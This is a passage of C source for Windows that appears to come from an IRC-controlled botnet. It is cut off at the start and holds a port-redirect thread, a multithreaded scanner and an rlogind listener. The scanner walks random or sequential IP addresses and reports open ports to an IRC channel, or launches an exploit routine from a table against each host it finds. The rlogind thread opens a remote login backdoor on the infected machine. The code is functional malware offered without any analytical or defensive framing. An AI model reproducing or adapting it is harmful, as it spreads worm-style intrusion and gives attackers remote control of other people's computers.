if ((csock = faccept(rsock, (LPSOCKADDR)&csin, &csin_len)) != INVALID_SOCKET) {
redirect.csock = csock;
redirect.gotinfo = FALSE;
sprintf(sendbuf,"[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), csin.sin_port, redirect.threadnum);
redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,csock);
threads[redirect.cthreadnum].parent = redirect.threadnum;
if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoopThread,(LPVOID)&redirect,0,&id)) {
while (redirect.gotinfo == FALSE)
Sleep(50);
} else {
addlogv("[REDIRECT]: Failed to start client thread, error: <%d>.", GetLastError());
break;
}
}
}
}
}
}
fclosesocket(csock);
fclosesocket(rsock);
clearthread(redirect.threadnum);
ExitThread(0);
}
DWORD WINAPI AdvPortScanner(LPVOID param)
{
IN_ADDR in;
char logbuf[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->cgotinfo = TRUE;
int threadnum=scan.cthreadnum;
int threadid=scan.cthreadid;
srand(GetTickCount());
while (advinfo[threads[threadnum].parent].info) {
DWORD dwIP;
if (scan.random)
dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
else
dwIP = AdvGetNextIP(threads[threadnum].parent);
in.s_addr = dwIP;
sprintf(logbuf,"IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
sprintf(threads[threadnum].name, logbuf);
if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
if (scan.exploit == -1) {
EnterCriticalSection(&CriticalSection);
sprintf(logbuf,"IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
if (!scan.silent) {
if (scan.msgchan[0] != '\0')
irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
else
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
}
addlog(logbuf);
LeaveCriticalSection(&CriticalSection);
} else {
EXINFO exinfo;
sprintf(exinfo.ip, finet_ntoa(in));
sprintf(exinfo.command, exploit[scan.exploit].command);
if (scan.msgchan[0] != '\0')
sprintf(exinfo.chan, scan.msgchan);
else
sprintf(exinfo.chan, scan.chan);
exinfo.sock = scan.sock;
exinfo.notice = scan.notice;
exinfo.silent = scan.silent;
exinfo.port = scan.port;
exinfo.threadnum = threadnum;
exinfo.exploit = scan.exploit;
exploit[scan.exploit].exfunc(exinfo);
}
}
Sleep(2000);
}
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
sprintf(buffer,"Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
while (scan.cgotinfo == FALSE)
Sleep(30);
} else {
sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError());
addlog(buffer);
}
Sleep(30);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI RlogindThread(LPVOID param)
{
RLOGIND rlogind = *((RLOGIND *)param);
RLOGIND *rloginds = (RLOGIND *)param;
rloginds->gotinfo = TRUE;
char sendbuf[IRCLINE];
int csin_len, Err;
unsigned long mode = 1;
WSADATA WSAData;
SECURITY_ATTRIBUTES SecurityAttributes;
DWORD id;
if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) {
addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err);
clearthread(rlogind.threadnum);
ExitThread(1);
}
if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) {
addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError());
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(1);
}
SOCKET ssock, csock;
SOCKADDR_IN csin, ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(rlogind.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
threads[rlogind.threadnum].sock = ssock;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) {
if (flisten(ssock, SOMAXCONN) == 0) {
SecurityAttributes.nLength = sizeof(SecurityAttributes);
SecurityAttributes.lpSecurityDescriptor = NULL;
SecurityAttributes.bInheritHandle = FALSE;
addlog("[RLOGIND]: Ready and waiting for incoming connections.");
BOOL flag = TRUE;
while (1) {
csin_len = sizeof(csin);
if ((csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET)
break;
if (fsetsockopt(csock, SOL_SOCKET, SO_KEEPALIVE,(char *)&flag,flag) != SOCKET_ERROR) {
rlogind.gotinfo = FALSE;
sprintf(sendbuf,"[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.", finet_ntoa(csin.sin_addr), fntohs(csin.sin_port), rlogind.threadnum);
addlog(sendbuf);
rlogind.cthreadnum = addthread(sendbuf,RLOGIN_THREAD,csock);
threads[rlogind.cthreadnum].parent = rlogind.threadnum;
if (threads[rlogind.cthreadnum].tHandle = CreateThread(&SecurityAttributes,0,&RlogindClientThread,(LPVOID)&rlogind,0,&id)) {
while (rlogind.gotinfo == FALSE)
Sleep(50);
} else {
addlogv("[RLOGIND]: Failed to start client thread, error: <%d>.", GetLastError());
break;
}
}
}
}
}
}
sprintf(sendbuf, "[RLOGIND]: Error: server failed, returned: <%d>.", fWSAGetLastError());
if (!rlogind.silent) irc_privmsg(rlogind.sock, rlogind.chan, sendbuf, rlogind.notice);
addlog(sendbuf);
fclosesocket(csock);
fclosesocket(ssock);
fWSACleanup();
clearthread(rlogind.threadnum);
ExitThread(0);
}
